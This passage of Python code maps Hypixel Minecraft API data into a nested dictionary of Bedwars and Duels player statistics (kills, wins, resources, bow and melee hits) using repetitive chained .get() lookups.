"four_four_lucky_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_diamond_resources_collected_bedwars", 0),
}
}
},
"rush": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_final_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_void_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_rush_diamond_resources_collected_bedwars", 0),
}
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_rush_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_rush_diamond_resources_collected_bedwars", 0),
}
}
},
"ultimate": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_ultimate_diamond_resources_collected_bedwars", 0),
}
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_ultimate_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_ultimate_diamond_resources_collected_bedwars", 0),
}
}
},
"voidless": {
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_voidless_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_voidless_diamond_resources_collected_bedwars", 0),
}
}
}
}
},
"duels": {
"coins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("coins", 0),
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("games_played_duels",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("losses", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("deaths", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("current_winstreak", 0),
"bow": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bow_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_bow_winstreak", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_bow_shots",
0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bow_duel_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bow_duel_damage_dealt", 0),
},
"bridge": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_duel_kills",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_duel_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_duel_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_bridge_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_duel_damage_dealt", 0),
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_doubles_kills",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_doubles_wins",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_bridge_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_doubles_damage_dealt", 0),
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_four_kills",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_four_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_four_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("bridge_four_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_bridge_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"bridge_four_damage_dealt", 0),
},
},
"classic": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_classic_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("classic_duel_bow_hits",
0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"classic_duel_damage_dealt", 0),
},
"skywars": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_sw_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_duel_bow_hits",
0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_duel_damage_dealt", 0),
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_doubles_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_doubles_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_doubles_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("sw_doubles_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_sw_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"sw_doubles_damage_dealt", 0),
}
},
"uhc": {
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_uhc_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_bow_shots", 0),
